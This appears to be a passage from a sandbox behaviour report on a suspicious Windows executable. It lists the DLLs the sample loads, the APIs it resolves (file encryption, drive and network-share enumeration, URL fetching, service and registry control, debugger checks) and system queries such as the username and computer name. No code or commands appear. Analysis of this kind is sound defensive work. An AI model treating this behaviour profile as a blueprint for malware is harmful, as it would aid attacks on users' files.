Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn

Module (431)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x76150000	3	Fn
Load	RPCRT4.dll	base_address = 0x75ed0000	1	Fn
Load	MPR.dll	base_address = 0x75600000	1	Fn
Load	WININET.dll	base_address = 0x77780000	1	Fn
Load	WINMM.dll	base_address = 0x755c0000	1	Fn
Load	SHLWAPI.dll	base_address = 0x76040000	1	Fn
Load	KERNEL32.dll	base_address = 0x76150000	1	Fn
Load	USER32.dll	base_address = 0x759a0000	1	Fn
Load	ADVAPI32.dll	base_address = 0x76490000	1	Fn
Load	SHELL32.dll	base_address = 0x768b0000	1	Fn
Load	ole32.dll	base_address = 0x75b30000	1	Fn
Load	OLEAUT32.dll	base_address = 0x76260000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x755a0000	1	Fn
Load	WS2_32.dll	base_address = 0x75c90000	1	Fn
Load	DNSAPI.dll	base_address = 0x75540000	1	Fn
Load	CRYPT32.dll	base_address = 0x77660000	1	Fn
Load	msvcr100.dll	base_address = 0x75480000	1	Fn
Load	Psapi.dll	base_address = 0x762f0000	1	Fn
Load	Shell32.dll	base_address = 0x768b0000	58	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x76150000	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe, size = 260	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x76164f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x7616359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x76161252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x76164208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x76164d28	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x761e410b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x761e4195	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x7616d31f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x7617ee7e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x77d5441c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x77d7c50e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x77d7c381	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x7617f088	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x77d605d7	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x77d7ca24	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77d30b8c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x77defde8	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x77d81e1d	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x761e4761	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x761dcd11	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x761e424f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x761e46b1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x761f6676	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x761e4751	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x761f65f1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x761e47c1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x761e47e1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x761e47f1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x7617eee0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x761649d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x76161856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x7616435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x7616186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x76163519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x7617d802	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x76167a10	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x76161b00	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x75ef1635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x75f11ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x75f4d918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x75f13fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x75eef48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x75602dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x75602f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x75603058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x7779ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x777fbe5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x7779b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x777c30f1	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x777a5c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x777af18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x777a9197	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x755c26e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7605a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x7605bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76053248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x760545bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x760581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x7604d65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x7607ad1a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x7616110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x76163587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x76165223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x761653c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x76164435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x761617d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x76165a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x761634c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x7616103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x7617c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x76164259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x76161136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x76165371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x76161282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x7617ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x76161986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x7616588e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x76165063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x7616170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x7616492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x761610ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x7618830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x76164620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x7618d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x76161072	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x76163ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x76163f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x76182b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x761633a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x76165929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x7616192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x76161700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x7616469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetShortPathNameA, address_out = 0x7618594d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x761659e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x761611c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x761611a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x76161222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x76179af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x76164442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x76188baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x7616168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x7616183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x761614b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x7618896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x7618828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x76164c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x761e4691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x7618735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x76161410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x761689b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x76162d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x76183102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileA, address_out = 0x76165444	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x76182a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x7617cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x761634b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x7616dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x7617174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x76164950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x76165558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x76164467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x7618d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x761634d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x761614fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x761611e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x761649ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x76161916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x761687c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x7618772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x761651cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x761651e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x761611f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x76161725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x76164d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77d445f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x7616465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x761658a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x76161946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77d43002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x7616495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77d3e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x76163c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x7617ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x76163da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x761e425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x761834d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x7617f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x76163bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x761617b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x76207bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x76161328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77d51f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x761e454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x7617ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x761651b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x76163531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x76164a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x76187aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadConsoleW, address_out = 0x7620739a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x7618d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x76168a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x7618d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77d32270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77d322b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x761e40d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x761614e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x76161450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x761617ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x76165189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x761614c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEnvironmentVariableA, address_out = 0x7616e331	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77d50fcb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77d49d35	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x76163509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x76161809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x7617ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x7618d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x7616179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x76164493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x76165235	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x761654ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76164a5d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x759b88f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x759b7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x759bb17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x759c0dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x759b7136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x759b8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x759c3559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77d425dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x759c05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x759b8bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x75a0fd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x759b787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x759b9abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x759b9a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x759b9679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x759b78e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x7649df7e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7649df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x7649ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x7649ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7649e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x764a157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7649df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x764a14d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x764a469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7649df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x764b7144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x764a468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7649df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x764b779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x7649c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x764a2a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x764a46ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x764a369c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x769417bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x7693e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x768c9ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x76af7078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x768d1e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x75b4b636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75b57259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x75b786d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75b79d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x7626fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x76264642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x76263eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x76263ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x76263e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x76263f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x76265dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x76264af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x755a9263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x75c9b131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x75c9311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x75ca7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x7555572c	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x7554436b	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptStringToBinaryA, address_out = 0x77695d77	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x7549c544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x762f1544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x762f1408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x762f152c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76935708	58	Fn

User (1)

Operation	Additional Information	Success	Count	Logfile
Get Username	user_name_out = 5p5NrGJn0jS HALPmcxz		1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	LPCWSTRszTitle	class_name = LPCWSTRszWindowClass, wndproc_parameter = 0		1	Fn

System (257)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = XDUWTFONO	1	Fn
Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2019-06-30 09:02:25 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 6183110777	1	Fn
Get Time	type = System Time, time = 2019-06-30 09:02:34 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 6950185589	1	Fn
Get Info	type = Hardware Information	249	Fn
Get Info	type = Operating System	1	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
